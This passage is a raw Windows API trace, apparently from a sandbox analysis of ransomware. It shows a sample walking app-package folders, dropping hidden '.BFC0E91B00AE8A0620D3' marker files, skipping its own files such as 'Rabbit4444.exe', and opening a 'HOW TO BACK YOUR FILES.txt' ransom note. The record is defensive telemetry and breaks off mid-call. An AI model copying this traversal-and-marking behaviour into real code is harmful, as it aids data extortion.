MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.704] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.704] CloseHandle (hObject=0x27c) returned 1 [0066.704] CloseHandle (hObject=0x228) returned 1 [0066.704] GetCurrentThreadId () returned 0xd98 [0066.704] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0066.704] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState" [0066.704] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11bb28 | out: hHeap=0xe0000) returned 1 [0066.705] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0066.705] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState" [0066.705] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState\\" [0066.705] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" [0066.705] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\roamingstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.706] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.709] FlushFileBuffers (hFile=0x228) returned 1 [0066.710] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.710] CloseHandle (hObject=0x228) returned 1 [0066.710] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState") returned 104 [0066.710] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.710] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf11522d2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.710] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.711] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.711] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.711] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.711] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf11522d2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.711] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.711] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.711] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.711] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.711] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.711] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf11522d2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf11522d2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf11522d2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.711] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.711] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.711] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf11522d2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf11522d2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf11522d2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.711] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.711] lstrcpyW (in: lpString1=0x130ec0a, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.711] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\RoamingState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\roamingstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.712] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.712] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.712] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.712] CloseHandle (hObject=0x27c) returned 1 [0066.712] CloseHandle (hObject=0x228) returned 1 [0066.712] GetCurrentThreadId () returned 0xd98 [0066.712] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122368 [0066.712] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState" [0066.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108760 | out: hHeap=0xe0000) returned 1 [0066.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122360 | out: hHeap=0xe0000) returned 1 [0066.712] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState" [0066.712] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState\\" [0066.712] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" [0066.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\localstate\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.714] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.716] FlushFileBuffers (hFile=0x228) returned 1 [0066.717] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.717] CloseHandle (hObject=0x228) returned 1 [0066.718] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState") returned 102 [0066.718] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.718] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf11522d2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0066.718] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.718] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.718] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.718] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.718] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf11522d2, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.718] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.718] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.718] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.718] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.718] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.718] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf11522d2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf11522d2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf117865e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.718] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.718] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.718] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf11522d2, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf11522d2, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf117865e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.718] FindClose (in: hFindFile=0x102510 | out: hFindFile=0x102510) returned 1 [0066.718] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.718] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalState\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\localstate\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.719] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.719] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.719] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.720] CloseHandle (hObject=0x27c) returned 1 [0066.720] CloseHandle (hObject=0x228) returned 1 [0066.720] GetCurrentThreadId () returned 0xd98 [0066.720] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122248 [0066.720] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache" [0066.720] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108838 | out: hHeap=0xe0000) returned 1 [0066.720] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122240 | out: hHeap=0xe0000) returned 1 [0066.720] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache" [0066.720] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache\\" [0066.720] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" [0066.720] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\localcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0066.721] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0066.725] FlushFileBuffers (hFile=0x228) returned 1 [0066.726] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0066.726] CloseHandle (hObject=0x228) returned 1 [0066.727] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache") returned 102 [0066.727] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0066.727] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf117865e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102950 [0066.727] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.727] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.727] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0066.727] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0066.727] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75403601, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75403601, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf117865e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0066.727] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.727] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0066.727] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0066.727] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0066.727] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0066.727] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf117865e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf117865e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf117865e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0066.727] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0066.727] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0066.727] FindNextFileW (in: hFindFile=0x102950, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf117865e, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf117865e, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf117865e, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0066.727] FindClose (in: hFindFile=0x102950 | out: hFindFile=0x102950) returned 1 [0066.727] lstrcpyW (in: lpString1=0x130ec06, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0066.727] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\LocalCache\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.modalsharepickerhost_cw5n1h2txyewy\\localcache\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0066.780] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x27c [0066.780] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0066.781] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0066.781] CloseHandle (hObject=0x27c) returned 1 [0066.781] CloseHandle (hObject=0x228) returned 1 [0066.781] GetCurrentThreadId () returned 0xd98 [0066.781] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122308 [0066.781] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData" [0066.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x115f70 | out: hHeap=0xe0000) returned 1 [0066.781] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122300 | out: hHeap=0xe0000) returned 1 [0066.781] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData" [0066.781] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ModalSharePickerHost_cw5n1h2txyewy\\AppData\\") 